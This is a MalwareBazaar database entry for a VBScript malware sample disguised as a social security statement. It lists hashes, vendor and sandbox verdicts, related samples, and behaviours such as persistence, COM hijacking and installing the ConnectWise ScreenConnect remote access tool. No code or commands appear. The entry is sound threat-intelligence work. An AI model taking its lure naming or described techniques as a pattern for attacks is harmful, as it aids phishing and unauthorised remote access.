MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

ConnectWise

Vendor detections: 10

Intelligence 10 IOCs YARA File information Comments

SHA256 hash:	046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7
SHA3-384 hash:	d7704b9dd9c99148ec042b38d4478810dfb4e805522327110e65f22d68333ca9dc4b7c1f60d94ed4c50d81774c23af12
SHA1 hash:	6f85720bad5d456c7ba758925b965fc6fbc5ae16
MD5 hash:	07521e40c0edeac4d7dc88183586c996
humanhash:	maine-equal-kitten-ohio
File name:	social-security-statement-upd.vbs
Download:	download sample
Signature	ConnectWise Create hunting rule
File size:	2'119 bytes
First seen:	2025-12-05 22:02:57 UTC
Last seen:	Never
File type:	vbs
MIME type:	text/plain
ssdeep	48:Lv1Wb5tmGwJmXiwJ89wdkyaj8Lz8AExXqIsQ:Lw5URJmJ89wOyaYI/x6IT
Threatray	1'076 similar samples on MalwareBazaar
TLSH	T1FE41520EDC5DDB642A8301F285689D0AC9B1C423B84A14AC7A4DCC979F315BCCB352EA
Magika	vba
Reporter	Anonymous
Tags:	ConnectWise vbs

Intelligence

File Origin

# of uploads :

# of downloads :

Origin country :

Vendor Threat Intelligence

No detections

Detection:

n/a

Link:

https://www.capesandbox.com/analysis/42700/

Verdict:

Malicious

Score:

92.5%

Link:

https://cyber-fortress.com/docs/result/index.php?id=693356a1920336450abbfef8

Tags:

trojandownloader connectwise shellcode html

Verdict:

Malicious

Threat level:

10/10

Confidence:

100%

Tags:

evasive expand lolbin lolbin masquerade msiexec rundll32

Link:

https://www.filescan.io/uploads/693356a1bc15eab491f59b95/reports/14dcc61e-a947-4430-b1ed-ebc8404e08e7/overview

Verdict:

Unknown

Link:

https://www.hybrid-analysis.com/sample/046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7

Verdict:

Malicious

File Type:

vbs

First seen:

2025-12-03T14:41:00Z UTC

Last seen:

2025-12-06T01:30:00Z UTC

Hits:

~100

Detections:

Trojan.JS.SAgent.sb HEUR:Trojan.VBS.SAgent.gen not-a-virus:HEUR:RemoteAdmin.MSIL.ConnectWise.gen

Link:

https://opentip.kaspersky.com/046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7/results?tab=lookup

Score:

24%

Verdict:

Benign

File Type:

SCRIPT

Link:

https://malprob.io/report/046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7

Verdict:

Malware

YARA:

1 match(es)

Tags:

ADODB.Stream MSXML2.ServerXMLHTTP.6.0 Scripting.FileSystemObject Shell.Application VBScript WScript.Shell

Link:

https://app.malva.re/file/07521e40c0edeac4d7dc88183586c996

Detection:

n/a

Link:

https://mwdb.cert.pl/sample/046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7/

Verdict:

Malicious

Threat:

RemoteAdmin.MSIL.ConnectWise

Link:

https://tip.neiki.dev/file/046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7

Threat name:

Win32.Trojan.Egairtigado

Status:

Malicious

First seen:

2025-12-03 22:03:58 UTC

File Type:

Text (VBS)

AV detection:

9 of 24 (37.50%)

Threat level:

5/5

Detection(s):

Suspicious file

Link:

https://check.spamhaus.org/check/?searchterm=arvdbdhg6wemqqrdjvtmdplxaf3edfdfu53j36ojrmedjy72aldq._file

Verdict:

malicious

Label(s):

admintool_screenconnect

ConnectWise

3c46671af655e0a0b864208dd7a2ab5cd5a9d1f095c1b2fc0f7882d62ddae275

ConnectWise

64049e058f3414066b1b68f84306ec307670b4e93543888b6e40d8e18b74b718

ConnectWise

64adb568ceb1d4abb36113bde0ca9bffa423be366262f8a4ec75b1e23aef50ad

ConnectWise

a0c8f8770fffd941b3e123023432e275aea210a7ab71a6bce5be890861f054c2

ConnectWise

error

ConnectWise

f28a060cd841574451960ddc5f2a706526597e361b1a7eb86245488aaa431014

ConnectWise

+ 1'066 additional samples on MalwareBazaar

Result

Malware family:

n/a

Score:

8/10

Tags:

adware backdoor discovery persistence privilege_escalation rat revoked_codesign spyware

Link:

https://tria.ge/reports/251205-1yeg1szjez/

Behaviour

Checks processor information in registry

Enumerates system info in registry

Modifies Internet Explorer settings

Modifies data under HKEY_USERS

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Drops file in Program Files directory

Drops file in Windows directory

Boot or Logon Autostart Execution: Authentication Package

Drops file in System32 directory

Enumerates connected drives

Checks computer location settings

ConnectWise ScreenConnect remote access tool

Event Triggered Execution: Component Object Model Hijacking

Executes dropped EXE

Loads dropped DLL

Badlisted process makes network request

Binary is signed using a ConnectWise certificate revoked for key compromise.

Sets service image path in registry

Please note that we are no longer able to provide a coverage score for Virus Total.

Threat name:

Suspicious File

Score:

0.51

Link:

https://yomi.yoroi.company/submissions/046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape

https://www.capesandbox.com/analysis/42700/

Comments

Login required

You need to login to in order to write a comment. Login with your abuse.ch account.

No comments found for this malware sample